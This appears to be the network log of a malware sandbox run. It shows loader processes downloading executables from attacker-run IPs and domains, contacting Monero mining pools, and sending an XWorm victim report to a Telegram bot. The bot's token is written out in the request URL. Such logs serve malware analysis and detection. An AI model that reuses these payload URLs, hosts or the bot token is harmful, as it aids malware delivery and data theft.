RegAsm.exe

Remote address:

188.114.96.2:443

Request

POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: prideconstituiiosjk.shop

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=em1klllqe96lohpepn9u8l9crk; expires=Fri, 06-Sep-2024 03:37:40 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fL61Q%2BVxWgqvZoNi9R3sBou8OP3U14d5flB0h6UjO4u5dvSXZNcGdl4u8J9Ydjo9tJY9r72gxgbNqZd8VRT2xLKpeVFfbOeJudCwhRmobFx4V9G4XcU4eVksWJhU9%2FRH013kvLwdLO6e3CU%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bf5f2c4863c1-LHR
alt-svc: h3=":443"; ma=86400
DNS

60.151.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

60.151.67.172.in-addr.arpa

IN PTR

Response
DNS

60.151.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

60.151.67.172.in-addr.arpa

IN PTR

Response
DNS

179.130.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

179.130.67.172.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

taskmgr.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

taskmgr.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

67.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.65.42.5.in-addr.arpa

IN PTR

Response
DNS

50.23.12.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

50.23.12.20.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

xmr.2miners.com

350789.exe

Remote address:

8.8.8.8:53

Request

xmr.2miners.com

IN A

Response

xmr.2miners.com

IN A

162.19.139.184
DNS

184.139.19.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

184.139.19.162.in-addr.arpa

IN PTR

Response

184.139.19.162.in-addr.arpa

IN PTR

p062minerscom
DNS

yip.su

CasPol.exe

Remote address:

8.8.8.8:53

Request

yip.su

IN A

Response

yip.su

IN A

172.67.169.89

yip.su

IN A

104.21.79.77
DNS

pastebin.com

CasPol.exe

Remote address:

8.8.8.8:53

Request

pastebin.com

IN A

Response

pastebin.com

IN A

172.67.19.24

pastebin.com

IN A

104.20.3.235

pastebin.com

IN A

104.20.4.235
GET

https://yip.su/RNWPd.exe

CasPol.exe

Remote address:

172.67.169.89:443

Request

GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
memory: 0.36199188232421875
expires: Mon, 13 May 2024 09:51:19 +0000
strict-transport-security: max-age=604800
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
x-frame-options: SAMEORIGIN
Cache-Control: max-age=14400
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 13 May 2024 09:48:53 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X70Csqf9DJLCtsME6nXbm9X%2Fz8xePIkqt0fcDas7E%2FJ42QG9xHqRSawIJPbtX4L4nhgBNBLlrnXBafAefSbf7ccUdd0%2B3BCbIlZSQrbnVapAgp%2Fzg4pU47Y%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd0b95594f7-LHR
alt-svc: h3=":443"; ma=86400
GET

https://pastebin.com/raw/E0rY26ni

CasPol.exe

Remote address:

172.67.19.24:443

Request

GET /raw/E0rY26ni HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: HIT
Age: 890
Last-Modified: Mon, 13 May 2024 09:36:29 GMT
Server: cloudflare
CF-RAY: 8831bfd0bc2293fb-LHR
GET

http://5.42.96.64/server/ww12/AppGate2103v01.exe

CasPol.exe

Remote address:

5.42.96.64:80

Request

GET /server/ww12/AppGate2103v01.exe HTTP/1.1
Host: 5.42.96.64
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: application/octet-stream
Content-Length: 6376736
Last-Modified: Mon, 13 May 2024 08:31:38 GMT
Connection: keep-alive
ETag: "6641cfea-614d20"
Accept-Ranges: bytes
DNS

onlycitylink.com

CasPol.exe

Remote address:

8.8.8.8:53

Request

onlycitylink.com

IN A

Response

onlycitylink.com

IN A

104.21.18.166

onlycitylink.com

IN A

172.67.182.192
GET

http://5.42.96.78/files/setup.exe

CasPol.exe

Remote address:

5.42.96.78:80

Request

GET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

http://5.42.96.78/files/Silent.exe

CasPol.exe

Remote address:

5.42.96.78:80

Request

GET /files/Silent.exe HTTP/1.1
Host: 5.42.96.78
DNS

realdeepai.org

CasPol.exe

Remote address:

8.8.8.8:53

Request

realdeepai.org

IN A

Response

realdeepai.org

IN A

172.67.193.79

realdeepai.org

IN A

104.21.90.14
DNS

1xst.ru

CasPol.exe

Remote address:

8.8.8.8:53

Request

1xst.ru

IN A

Response

1xst.ru

IN A

41.83.85.253

1xst.ru

IN A

201.119.43.196

1xst.ru

IN A

200.114.83.251

1xst.ru

IN A

92.36.226.66

1xst.ru

IN A

188.237.2.116

1xst.ru

IN A

175.119.10.231

1xst.ru

IN A

179.159.229.64

1xst.ru

IN A

190.146.112.188

1xst.ru

IN A

189.143.170.242

1xst.ru

IN A

211.40.39.251
DNS

1xst.ru

CasPol.exe

Remote address:

8.8.8.8:53

Request

1xst.ru

IN A

Response

1xst.ru

IN A

211.40.39.251

1xst.ru

IN A

41.83.85.253

1xst.ru

IN A

201.119.43.196

1xst.ru

IN A

200.114.83.251

1xst.ru

IN A

92.36.226.66

1xst.ru

IN A

188.237.2.116

1xst.ru

IN A

175.119.10.231

1xst.ru

IN A

179.159.229.64

1xst.ru

IN A

190.146.112.188

1xst.ru

IN A

189.143.170.242
GET

http://5.42.96.78/files/setup.exe

CasPol.exe

Remote address:

5.42.96.78:80

Request

GET /files/setup.exe HTTP/1.1
Host: 5.42.96.78
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Fri, 10 May 2024 08:32:14 GMT
ETag: "63fa73-618155f6aed8b"
Accept-Ranges: bytes
Content-Length: 6552179
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

CasPol.exe

Remote address:

172.67.193.79:443

Request

GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FBltb32oAUoobtxbTvQSVZV9CrnVMsmC7Veqk5%2BMTm0lOJyZydwqC9M4mkqnDnhiRAqHaAL1IkaMR1nLjl%2BJM%2BOpjqB4ewcPl7OOmw0Ljv1%2Fmr5Bvss9IhhBLn4xNUhRSg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd23de67193-LHR
alt-svc: h3=":443"; ma=86400
GET

https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

CasPol.exe

Remote address:

104.21.18.166:443

Request

GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fYss0gXHtSoiSt94u0gQMKVK7dokJzvdB6ORtTFwcKCymWzpKZjnSvAmi4JClSn5SVs%2FppzP%2FSvLKvx0qhJLOLRypyaFKnb%2FBqoSUFSrP1ApKMQZGwJSrqpfXBFcyQyAxEUv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd22e7763b1-LHR
alt-svc: h3=":443"; ma=86400
GET

https://onlycitylink.com/baf14778c246e15550645e30ba78ce1c.exe

CasPol.exe

Remote address:

104.21.18.166:443

Request

GET /baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: onlycitylink.com
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r0eJyntMvI%2BPZAOAgVAU%2FFq7Vb7S8z%2BJsW3uqq5g%2FafRWdkiDTEKVybXcLpSRm6nrfPNI9xRlUDHP81HQdAMBng%2BTABN1tyFZi267yZmx6R8kDu3UA%2FcIPFlNlYOP3J0Ccjv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd22e1f7731-LHR
alt-svc: h3=":443"; ma=86400
GET

https://realdeepai.org/6779d89b7a368f4f3f340b50a9d18d71.exe

CasPol.exe

Remote address:

172.67.193.79:443

Request

GET /6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: realdeepai.org
Connection: Keep-Alive

Response

HTTP/1.1 307 Temporary Redirect

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Location: https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7TeW25sArhCxGAiej8nFtjSMhP4Y8xx2EIUw8%2FcPRAY%2FXsya8KIfClSdG5K4C%2BF9mEqqkgjIeDGGpsb9Xt%2FPPiCO3X8u%2Bkn3XfRC3%2Bv4b4gzYqeHWk3sygPytj1e58FFTg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd23f8793e3-LHR
alt-svc: h3=":443"; ma=86400
DNS

firstfirecar.com

CasPol.exe

Remote address:

8.8.8.8:53

Request

firstfirecar.com

IN A

Response

firstfirecar.com

IN A

172.67.193.220

firstfirecar.com

IN A

104.21.60.76
DNS

jonathantwo.com

CasPol.exe

Remote address:

8.8.8.8:53

Request

jonathantwo.com

IN A

Response

jonathantwo.com

IN A

172.67.176.131

jonathantwo.com

IN A

104.21.31.124
DNS

jonathantwo.com

CasPol.exe

Remote address:

8.8.8.8:53

Request

jonathantwo.com

IN A

Response

jonathantwo.com

IN A

172.67.176.131

jonathantwo.com

IN A

104.21.31.124
GET

https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe

CasPol.exe

Remote address:

172.67.193.220:443

Request

GET /f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4325752
Connection: keep-alive
Last-Modified: Mon, 13 May 2024 09:34:21 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 467
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyiGounnUtsyZttkdsFdCwXtQ2F4EsypiPwoBowrQZUSkzpE7Br6jx4qzFk3Fm5w6pPGqNdUKDxkPECd9jzy%2BAKGJDLAM1BlUcBueAARApBqtWETxyOiUweJnWE34hluYAPS"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd3db826323-LHR
alt-svc: h3=":443"; ma=86400
GET

https://firstfirecar.com/f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe

CasPol.exe

Remote address:

172.67.193.220:443

Request

GET /f63d91182a9ab2f450c72a49bd8c8929/baf14778c246e15550645e30ba78ce1c.exe HTTP/1.1
Host: firstfirecar.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4325752
Connection: keep-alive
Last-Modified: Mon, 13 May 2024 09:34:21 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4UmYKjQ0Mj3nFaezWIx4FafL%2BuxnWrLewRhF0hgoS1o4bSrtkp95pCW6IGyoJ8iwf%2F3grDrjm7xEuEwis7j3NpEaDBw9n5KJw5QDLI014H6r%2FAYyT6u45%2BciJRLa0MVILZ9e"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd3de4023dc-LHR
alt-svc: h3=":443"; ma=86400
GET

https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe

CasPol.exe

Remote address:

172.67.176.131:443

Request

GET /f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4325776
Connection: keep-alive
Last-Modified: Mon, 13 May 2024 09:34:37 GMT
Cache-Control: max-age=14400
CF-Cache-Status: MISS
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a4NjToEuqgcWeeDMItXAmm%2FWeVNyRDeBn1odVPzggIV%2FSIP66NtLeOY7z%2BruzJHAC43HQvobIeTu1CbaiMrlHy7H4usqw5LZF4VjKQCB7nu%2B%2BkG1j6ZF4UB9Ybb9mYY8%2Fqk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd3fcad891e-LHR
alt-svc: h3=":443"; ma=86400
GET

https://jonathantwo.com/f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe

CasPol.exe

Remote address:

172.67.176.131:443

Request

GET /f63d91182a9ab2f450c72a49bd8c8929/6779d89b7a368f4f3f340b50a9d18d71.exe HTTP/1.1
Host: jonathantwo.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:19 GMT
Content-Type: application/x-ms-dos-executable
Content-Length: 4325776
Connection: keep-alive
Last-Modified: Mon, 13 May 2024 09:34:37 GMT
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 0
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c22W7ZOQ2NdQP3nW8OdXi6tSKrLNRQny3wc%2BExDemTCMdpn%2FxzpN%2BE0Cx9zom6h0%2BoywTsTreWFoEzuopLTa1rEiE99ymjgIJEbUhF974HaWe1yIniNQu7BkBpDys68R%2FTI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831bfd3ff9455ea-LHR
alt-svc: h3=":443"; ma=86400
GET

http://1xst.ru/tech/upd2.php

CasPol.exe

Remote address:

41.83.85.253:80

Request

GET /tech/upd2.php HTTP/1.1
Host: 1xst.ru
Connection: Keep-Alive
GET

http://1xst.ru/tech/upd2.php

CasPol.exe

Remote address:

41.83.85.253:80

Request

GET /tech/upd2.php HTTP/1.1
Host: 1xst.ru
Connection: Keep-Alive
DNS

24.19.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.19.67.172.in-addr.arpa

IN PTR

Response
DNS

24.19.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

24.19.67.172.in-addr.arpa

IN PTR
DNS

89.169.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.169.67.172.in-addr.arpa

IN PTR

Response
DNS

89.169.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

89.169.67.172.in-addr.arpa

IN PTR
DNS

79.193.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.193.67.172.in-addr.arpa

IN PTR

Response
DNS

79.193.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.193.67.172.in-addr.arpa

IN PTR
DNS

166.18.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.18.21.104.in-addr.arpa

IN PTR

Response
DNS

166.18.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

166.18.21.104.in-addr.arpa

IN PTR
DNS

64.96.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.96.42.5.in-addr.arpa

IN PTR

Response
DNS

64.96.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

64.96.42.5.in-addr.arpa

IN PTR
DNS

220.193.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.193.67.172.in-addr.arpa

IN PTR

Response
DNS

220.193.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.193.67.172.in-addr.arpa

IN PTR
DNS

131.176.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.176.67.172.in-addr.arpa

IN PTR

Response
DNS

131.176.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

131.176.67.172.in-addr.arpa

IN PTR
DNS

253.85.83.41.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.85.83.41.in-addr.arpa

IN PTR

Response
DNS

253.85.83.41.in-addr.arpa

Remote address:

8.8.8.8:53

Request

253.85.83.41.in-addr.arpa

IN PTR
DNS

api.telegram.org

taskmgr.exe

Remote address:

8.8.8.8:53

Request

api.telegram.org

IN A

Response

api.telegram.org

IN A

149.154.167.220
GET

https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A8DDC453C92C5E97346AB%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20True%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.6

taskmgr.exe

Remote address:

149.154.167.220:443

Request

GET /bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A8DDC453C92C5E97346AB%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20True%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Mon, 13 May 2024 09:51:22 GMT
Content-Type: application/json
Content-Length: 491
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
DNS

220.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

220.167.154.149.in-addr.arpa

IN PTR

Response
GET

http://5.42.96.78/files/Silent.exe

CasPol.exe

Remote address:

5.42.96.78:80

Request

GET /files/Silent.exe HTTP/1.1
Host: 5.42.96.78

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:29 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Sun, 12 May 2024 06:19:02 GMT
ETag: "291e00-6183bbeb81df5"
Accept-Ranges: bytes
Content-Length: 2694656
Content-Type: application/x-msdownload
GET

http://85.192.56.26/api/bing_release.php

7EhPCHLwVUzTFL9SfbnUelQh.exe

Remote address:

85.192.56.26:80

Request

GET /api/bing_release.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Host: 85.192.56.26

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

api.myip.com

7EhPCHLwVUzTFL9SfbnUelQh.exe

Remote address:

8.8.8.8:53

Request

api.myip.com

IN A

Response

api.myip.com

IN A

104.26.8.59

api.myip.com

IN A

104.26.9.59

api.myip.com

IN A

172.67.75.163
GET

https://api.myip.com/

7EhPCHLwVUzTFL9SfbnUelQh.exe

Remote address:

104.26.8.59:443

Request

GET / HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Host: api.myip.com

Response

HTTP/1.1 200 OK

Date: Mon, 13 May 2024 09:51:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWoXMED0DNeo98aUNpgMZItJIjwHBtD1m84xaa8KG%2FxUIr94htOSFsf3y1Yg%2BcNNSu2XH337ecaCE%2FS6MvMftY1OOenGNbrXSUPfxbDSG1n5QWh7%2FwFHCIrpUNo5YQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8831c01f481c63d3-LHR
DNS

ipinfo.io

7EhPCHLwVUzTFL9SfbnUelQh.exe

Remote address:

8.8.8.8:53

Request

ipinfo.io

IN A

Response

ipinfo.io

IN A

34.117.186.192
GET

https://ipinfo.io/widget/demo/191.101.209.39

7EhPCHLwVUzTFL9SfbnUelQh.exe

Remote address:

34.117.186.192:443

Request

GET /widget/demo/191.101.209.39 HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Host: ipinfo.io

Response

HTTP/1.1 200 OK

server: nginx/1.24.0
date: Mon, 13 May 2024 09:51:32 GMT
content-type: application/json; charset=utf-8
Content-Length: 923
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
x-envoy-upstream-service-time: 1
via: 1.1 google
strict-transport-security: max-age=2592000; includeSubDomains
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

26.56.192.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.56.192.85.in-addr.arpa

IN PTR

Response

26.56.192.85.in-addr.arpa

IN PTR

somber-healthaezanetwork
DNS

26.56.192.85.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.56.192.85.in-addr.arpa

IN PTR

Response

26.56.192.85.in-addr.arpa

IN PTR

somber-healthaezanetwork
DNS

59.8.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

59.8.26.104.in-addr.arpa

IN PTR

Response
DNS

192.186.117.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

192.186.117.34.in-addr.arpa

IN PTR

Response

192.186.117.34.in-addr.arpa

IN PTR

19218611734bcgoogleusercontentcom
DNS

beshomandotestbesnd.run.place

taskmgr.exe

Remote address:

8.8.8.8:53

Request

beshomandotestbesnd.run.place

IN A

Response

beshomandotestbesnd.run.place

IN A

45.88.186.125
DNS

beshomandotestbesnd.run.place

taskmgr.exe

Remote address:

8.8.8.8:53

Request

beshomandotestbesnd.run.place

IN A
DNS

pool.hashvault.pro

Remote address:

8.8.8.8:53

Request

pool.hashvault.pro

IN A

Response

pool.hashvault.pro

IN A

95.179.241.203

pool.hashvault.pro

IN A

45.76.89.70
DNS

70.89.76.45.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.89.76.45.in-addr.arpa

IN PTR

Response

70.89.76.45.in-addr.arpa

IN PTR

45768970vultrusercontentcom
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

79.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

79.190.18.2.in-addr.arpa

IN PTR

Response

79.190.18.2.in-addr.arpa

IN PTR

a2-18-190-79deploystaticakamaitechnologiescom
DNS

beshomandotestbesnd.run.place

taskmgr.exe

Remote address:

8.8.8.8:53

Request

beshomandotestbesnd.run.place

IN A

Response

beshomandotestbesnd.run.place

IN A

45.88.186.125
DNS

service-domain.xyz

Remote address:

8.8.8.8:53

Request

service-domain.xyz

IN A

Response

service-domain.xyz

IN A

3.80.150.121

204.79.197.237:443

